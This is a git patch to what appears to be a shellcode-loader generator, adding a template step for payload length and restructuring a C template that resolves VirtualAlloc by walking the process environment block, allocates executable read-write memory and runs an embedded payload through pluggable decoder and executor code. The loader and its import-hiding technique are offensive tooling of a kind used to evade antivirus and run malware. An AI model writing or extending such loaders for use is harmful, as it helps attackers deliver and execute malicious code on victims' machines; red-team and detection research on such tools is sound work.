From 2029be0ce854a333932fb7908003b5b8605943b3 Mon Sep 17 00:00:00 2001
From: Dobin <dobin.rutishauser@gmail.com>
Date: Sun, 18 Feb 2024 22:51:10 +0000
Subject: [PATCH] feature: peb_walk template

---
 phases/templater.py        |  3 +++
 source/peb_walk/template.c | 15 ++++++++-------
 2 files changed, 11 insertions(+), 7 deletions(-)

diff --git a/phases/templater.py b/phases/templater.py
index f766b90..36dac9a 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -46,6 +46,9 @@ def create_c_from_template(
     filepath = "plugins/executor/{}.c".format(exec_style.value)
     with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
         plugin_executor = file.read()
+        plugin_executor = Template(plugin_executor).render({
+            'PAYLOAD_LEN': payload_len,
+        })
     
     if source_style == SourceStyle.peb_walk:
         if use_templates:
diff --git a/source/peb_walk/template.c b/source/peb_walk/template.c
index 2a2021c..9d8ce5a 100644
--- a/source/peb_walk/template.c
+++ b/source/peb_walk/template.c
@@ -85,14 +85,15 @@ int main()
 			_In_ DWORD  flProtect)) _GetProcAddress((HMODULE)base, VirtualAlloc_str);
 	if (_VirtualAlloc == NULL) return 4;
 	char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);
-	// 11223344 is a magic number which will be replaced in the asm source
-	// with the payload length.
-	for(int n=0; n<{{PAYLOAD_LEN}}; n++) {
-		dest[n] = supermega_payload[n];
-	}
 
-	// Exec shellcode
-	 (*(void(*)())(dest))();
+	// Copy
+	// from: supermega_payload[]
+	// to:   dest[]
+    // len:  0x11223344
+{{ plugin_decoder }}
+
+    // Execute *dest
+{{ plugin_executor }}
 
 	return 0;
 }